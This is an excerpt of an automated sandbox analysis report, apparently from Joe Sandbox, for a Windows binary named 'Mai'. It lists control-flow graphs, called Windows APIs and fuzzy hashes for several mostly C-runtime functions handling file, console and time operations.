                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 679 7ff6dd66c01c-7ff6dd66c042 680 7ff6dd66c05d-7ff6dd66c061 679->680 681 7ff6dd66c044-7ff6dd66c058 call 7ff6dd6654a4 call 7ff6dd6654c4 679->681 683 7ff6dd66c437-7ff6dd66c443 call 7ff6dd6654a4 call 7ff6dd6654c4 680->683 684 7ff6dd66c067-7ff6dd66c06e 680->684 697 7ff6dd66c44e 681->697 703 7ff6dd66c449 call 7ff6dd66aea4 683->703 684->683 686 7ff6dd66c074-7ff6dd66c0a2 684->686 686->683 689 7ff6dd66c0a8-7ff6dd66c0af 686->689 692 7ff6dd66c0c8-7ff6dd66c0cb 689->692 693 7ff6dd66c0b1-7ff6dd66c0c3 call 7ff6dd6654a4 call 7ff6dd6654c4 689->693 695 7ff6dd66c433-7ff6dd66c435 692->695 696 7ff6dd66c0d1-7ff6dd66c0d7 692->696 693->703 700 7ff6dd66c451-7ff6dd66c468 695->700 696->695 701 7ff6dd66c0dd-7ff6dd66c0e0 696->701 697->700 701->693 705 7ff6dd66c0e2-7ff6dd66c107 701->705 703->697 708 7ff6dd66c13a-7ff6dd66c141 705->708 709 7ff6dd66c109-7ff6dd66c10b 705->709 710 7ff6dd66c116-7ff6dd66c12d call 7ff6dd6654a4 call 7ff6dd6654c4 call 7ff6dd66aea4 708->710 711 7ff6dd66c143-7ff6dd66c16b call 7ff6dd66dbbc call 7ff6dd66af0c * 2 708->711 712 7ff6dd66c10d-7ff6dd66c114 709->712 713 7ff6dd66c132-7ff6dd66c138 709->713 745 7ff6dd66c2c0 710->745 740 7ff6dd66c16d-7ff6dd66c183 call 7ff6dd6654c4 call 7ff6dd6654a4 711->740 741 7ff6dd66c188-7ff6dd66c1b3 call 7ff6dd66c844 711->741 712->710 712->713 716 7ff6dd66c1b8-7ff6dd66c1cf 713->716 717 7ff6dd66c24a-7ff6dd66c254 call 7ff6dd673f8c 716->717 718 7ff6dd66c1d1-7ff6dd66c1d9 716->718 731 7ff6dd66c25a-7ff6dd66c26f 717->731 732 7ff6dd66c2de 717->732 718->717 721 7ff6dd66c1db-7ff6dd66c1dd 718->721 721->717 725 7ff6dd66c1df-7ff6dd66c1f5 721->725 725->717 729 7ff6dd66c1f7-7ff6dd66c203 725->729 729->717 734 7ff6dd66c205-7ff6dd66c207 729->734 731->732 737 7ff6dd66c271-7ff6dd66c283 GetConsoleMode 731->737 736 7ff6dd66c2e3-7ff6dd66c303 ReadFile 732->736 734->717 739 7ff6dd66c209-7ff6dd66c221 734->739 742 7ff6dd66c3fd-7ff6dd66c406 GetLastError 736->742 743 7ff6dd66c309-7ff6dd66c311 736->743 737->732 744 7ff6dd66c285-7ff6dd66c28d 737->744 739->717 749 7ff6dd66c223-7ff6dd66c22f 739->749 740->745 741->716 746 7ff6dd66c408-7ff6dd66c41e call 7ff6dd6654c4 call 7ff6dd6654a4 742->746 747 7ff6dd66c423-7ff6dd66c426 742->747 743->742 751 7ff6dd66c317 743->751 744->736 753 7ff6dd66c28f-7ff6dd66c2b1 ReadConsoleW 744->753 748 7ff6dd66c2c3-7ff6dd66c2cd call 7ff6dd66af0c 745->748 746->745 759 7ff6dd66c42c-7ff6dd66c42e 747->759 760 7ff6dd66c2b9-7ff6dd66c2bb call 7ff6dd665438 747->760 748->700 749->717 758 7ff6dd66c231-7ff6dd66c233 749->758 762 7ff6dd66c31e-7ff6dd66c333 751->762 754 7ff6dd66c2d2-7ff6dd66c2dc 753->754 755 7ff6dd66c2b3 GetLastError 753->755 754->762 755->760 758->717 767 7ff6dd66c235-7ff6dd66c245 758->767 759->748 760->745 762->748 769 7ff6dd66c335-7ff6dd66c340 762->769 767->717 772 7ff6dd66c367-7ff6dd66c36f 769->772 773 7ff6dd66c342-7ff6dd66c35b call 7ff6dd66bc34 769->773 774 7ff6dd66c3eb-7ff6dd66c3f8 call 7ff6dd66ba74 772->774 775 7ff6dd66c371-7ff6dd66c383 772->775 778 7ff6dd66c360-7ff6dd66c362 773->778 774->778 779 7ff6dd66c385 775->779 780 7ff6dd66c3de-7ff6dd66c3e6 775->780 778->748 783 7ff6dd66c38a-7ff6dd66c391 779->783 780->748 784 7ff6dd66c3cd-7ff6dd66c3d8 783->784 785 7ff6dd66c393-7ff6dd66c397 783->785 784->780 786 7ff6dd66c399-7ff6dd66c3a0 785->786 787 7ff6dd66c3b3 785->787 786->787 788 7ff6dd66c3a2-7ff6dd66c3a6 786->788 789 7ff6dd66c3b9-7ff6dd66c3c9 787->789 788->787 790 7ff6dd66c3a8-7ff6dd66c3b1 788->790 789->783 791 7ff6dd66c3cb 789->791 790->789 791->780
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
                                                            • Instruction ID: a67850f9a032dde42fdcf079281b44b900bd065a938506347de54a9b0cc37ee4
                                                            • Opcode Fuzzy Hash: be7416da91f84ed5bfdd546aa92e4ee07cb2f4e154380db95b5ab7bb0620c26f
                                                            • Instruction Fuzzy Hash: DFC1D232D0CBC692EB60BF5598002BD7B54EB90B80F5A4173DA4D87791EE7CE865A3C0
                                                            Function 00007FF6DD66D520 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 902 7ff6dd66d520-7ff6dd66d545 903 7ff6dd66d54b-7ff6dd66d54e 902->903 904 7ff6dd66d813 902->904 906 7ff6dd66d587-7ff6dd66d5b3 903->906 907 7ff6dd66d550-7ff6dd66d582 call 7ff6dd66add8 903->907 905 7ff6dd66d815-7ff6dd66d825 904->905 908 7ff6dd66d5b5-7ff6dd66d5bc 906->908 909 7ff6dd66d5be-7ff6dd66d5c4 906->909 907->905 908->907 908->909 912 7ff6dd66d5c6-7ff6dd66d5cf call 7ff6dd66c8e0 909->912 913 7ff6dd66d5d4-7ff6dd66d5e9 call 7ff6dd673f8c 909->913 912->913 917 7ff6dd66d703-7ff6dd66d70c 913->917 918 7ff6dd66d5ef-7ff6dd66d5f8 913->918 919 7ff6dd66d760-7ff6dd66d785 WriteFile 917->919 920 7ff6dd66d70e-7ff6dd66d714 917->920 918->917 921 7ff6dd66d5fe-7ff6dd66d602 918->921 922 7ff6dd66d787-7ff6dd66d78d GetLastError 919->922 923 7ff6dd66d790 919->923 924 7ff6dd66d74c-7ff6dd66d75e call 7ff6dd66cfd8 920->924 925 7ff6dd66d716-7ff6dd66d719 920->925 926 7ff6dd66d604-7ff6dd66d60c call 7ff6dd664900 921->926 927 7ff6dd66d613-7ff6dd66d61e 921->927 922->923 929 7ff6dd66d793 923->929 945 7ff6dd66d6f0-7ff6dd66d6f7 924->945 930 7ff6dd66d71b-7ff6dd66d71e 925->930 931 7ff6dd66d738-7ff6dd66d74a call 7ff6dd66d1f8 925->931 926->927 933 7ff6dd66d620-7ff6dd66d629 927->933 934 7ff6dd66d62f-7ff6dd66d644 GetConsoleMode 927->934 938 7ff6dd66d798 929->938 939 7ff6dd66d7a4-7ff6dd66d7ae 930->939 940 7ff6dd66d724-7ff6dd66d736 call 7ff6dd66d0dc 930->940 931->945 933->917 933->934 935 7ff6dd66d6fc 934->935 936 7ff6dd66d64a-7ff6dd66d650 934->936 935->917 943 7ff6dd66d6d9-7ff6dd66d6eb call 7ff6dd66cb60 936->943 944 7ff6dd66d656-7ff6dd66d659 936->944 946 7ff6dd66d79d 938->946 947 7ff6dd66d80c-7ff6dd66d811 939->947 948 7ff6dd66d7b0-7ff6dd66d7b5 939->948 940->945 943->945 952 7ff6dd66d65b-7ff6dd66d65e 944->952 953 7ff6dd66d664-7ff6dd66d672 944->953 945->938 946->939 947->905 954 7ff6dd66d7b7-7ff6dd66d7ba 948->954 955 7ff6dd66d7e3-7ff6dd66d7ed 948->955 952->946 952->953 959 7ff6dd66d674 953->959 960 7ff6dd66d6d0-7ff6dd66d6d4 953->960 961 7ff6dd66d7bc-7ff6dd66d7cb 954->961 962 7ff6dd66d7d3-7ff6dd66d7de call 7ff6dd665480 954->962 957 7ff6dd66d7f4-7ff6dd66d803 955->957 958 7ff6dd66d7ef-7ff6dd66d7f2 955->958 957->947 958->904 958->957 963 7ff6dd66d678-7ff6dd66d68f call 7ff6dd674058 959->963 960->929 961->962 962->955 968 7ff6dd66d6c7-7ff6dd66d6cd GetLastError 963->968 969 7ff6dd66d691-7ff6dd66d69d 963->969 968->960 970 7ff6dd66d6bc-7ff6dd66d6c3 969->970 971 7ff6dd66d69f-7ff6dd66d6b1 call 7ff6dd674058 969->971 970->960 973 7ff6dd66d6c5 970->973 971->968 975 7ff6dd66d6b3-7ff6dd66d6ba 971->975 973->963 975->970
                                                            APIs
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6DD66D50B), ref: 00007FF6DD66D63C
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6DD66D50B), ref: 00007FF6DD66D6C7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ConsoleErrorLastMode
                                                            • String ID:
                                                            • API String ID: 953036326-0
                                                            • Opcode ID: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                            • Instruction ID: 7b6b5a5cc206741c3eed9e36d846211f476e50eb1a3894a2249c93769cb93adf
                                                            • Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                            • Instruction Fuzzy Hash: 5991D672E186D195F750AF2594402BD2BA0BB44B88F14417BDE0ED7A84EF38E462EBC0
                                                            Function 00007FF6DD66FCEC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_isindst
                                                            • String ID:
                                                            • API String ID: 4170891091-0
                                                            • Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                            • Instruction ID: f56275187c7ec62ffda404b6b9db8c8aaab44cbabbbd82643d4dcc29f87ef1d4
                                                            • Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                            • Instruction Fuzzy Hash: 1B512772F046929AFB24EF34D9556BC6BA1AB40358F100137DD1E92AE5FF38A41AD7C0
                                                            Function 00007FF6DD665854 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                            • String ID:
                                                            • API String ID: 2780335769-0
                                                            • Opcode ID: a7b857db6b01e19318b34c0e1f4ae245464e2a3bbbae32caf4e8ae7d5ae051c5
                                                            • Instruction ID: f75d76de4dfa3c75cdbe327fa54107f4f41301e12249881519b87b72fb8665da
                                                            • Opcode Fuzzy Hash: a7b857db6b01e19318b34c0e1f4ae245464e2a3bbbae32caf4e8ae7d5ae051c5
                                                            • Instruction Fuzzy Hash: 78516E32E086C18AFB10EF61D4513BD33B1AB54B58F148676DE4D87699FF38E4A09780
                                                            Function 00007FF6DD65C07C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 1452418845-0
                                                            • Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                            • Instruction ID: baf909013fd7070890fea7f75496f17925fc5212afb5746afdf193aa026038e3
                                                            • Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                            • Instruction Fuzzy Hash: 19312821E4C6C781FA24BB64D8513BD23919F41788F464037E90EC76DBFE2DB8A4A2C1
                                                            Function 00007FF6DD665700 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 1279662727-0
                                                            • Opcode ID: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
                                                            • Instruction ID: 2f9509dedbf0757159a538401dd220fd6de2d4d695ee9f232245f1ea20454e15
                                                            • Opcode Fuzzy Hash: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
                                                            • Instruction Fuzzy Hash: 0E419D32D187C283E750AB2095113AD6760FF947A4F109376EA9C83AD6FF6CA5F09780
                                                            Function 00007FF6DD669FC0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                            • Instruction ID: ea93c62fb0832dac774a8afb0d56a1a760fab88834f54f6a1ad77667345dec37
                                                            • Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                            • Instruction Fuzzy Hash: 10D09210F086CA62EB183F7558990BC12156F88709F14187ED80B87797FD3DBCAEA2C0
                                                            Function 00007FF6DD66027C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                            • Instruction ID: a48c79914cf000c25839ba9665b1ae4039475b05ab6e05d05d183d6ee47feab7
                                                            • Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                            • Instruction Fuzzy Hash: D9510521F496C286EB78FE26940067E6281EF41BA9F144776DD6C877C5EF3CE460A6C0
                                                            Function 00007FF6DD66B11C Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6DD66AF99,?,?,00000000,00007FF6DD66B04E), ref: 00007FF6DD66B18A
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6DD66AF99,?,?,00000000,00007FF6DD66B04E), ref: 00007FF6DD66B194
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                            • String ID:
                                                            • API String ID: 1687624791-0
                                                            • Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                            • Instruction ID: 81c162daaf9df48c6f3751663e588d17e17493b0856033fdef6f0e269517839e
                                                            • Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                            • Instruction Fuzzy Hash: 8F21D421F186C2A1FE907B38945427D53815F847A0F4452B7DA1DC73C2FE2CF865A2C1
                                                            Function 00007FF6DD66C6F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                            • Instruction ID: d783cd0d1c63078679af9ae4354bab3735296329cb7ccff8c2fb1d90decd83d5
                                                            • Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                            • Instruction Fuzzy Hash: 1611C162E18BC181EA10AB25A80416D6B61AB44BF4F540372EEBD877D9EF3CD46197C0
                                                            Function 00007FF6DD6659FC Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD665911), ref: 00007FF6DD665A2F
                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD665911), ref: 00007FF6DD665A45
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Time$System$FileLocalSpecific
                                                            • String ID:
                                                            • API String ID: 1707611234-0
                                                            • Opcode ID: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
                                                            • Instruction ID: 6071c914ed387bb2bfae2d8ea96339690885122dbb5b43664fe9a70f89b967d1
                                                            • Opcode Fuzzy Hash: 01955a0fff7c8d04301666730a5fae84f6474b835d1eccbedadb07c42297a861
                                                            • Instruction Fuzzy Hash: A011A732E0C6C691EB54AB55A45213EB760FB85761F500236FAADC59D8FF3CD064EB80
                                                            Function 00007FF6DD6680BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD667F39), ref: 00007FF6DD6680DF
                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD667F39), ref: 00007FF6DD6680F5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Time$System$FileLocalSpecific
                                                            • String ID:
                                                            • API String ID: 1707611234-0
                                                            • Opcode ID: a96e0719182de34ecec5e80d0f089f3d687da4b36ed0106fdd62851d0e6a23ab
                                                            • Instruction ID: 58a582dcb8719dd4b11cecd72e4e547767a2335eeaf5419a64068341c87b6027
                                                            • Opcode Fuzzy Hash: a96e0719182de34ecec5e80d0f089f3d687da4b36ed0106fdd62851d0e6a23ab
                                                            • Instruction Fuzzy Hash: 95018622D0C2D682D750AB24A40117EB3A0FB41B61F500236E6A9815D8EF7DD460EB80
                                                            Function 00007FF6DD66AF0C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF22
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF2C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmpDownload File
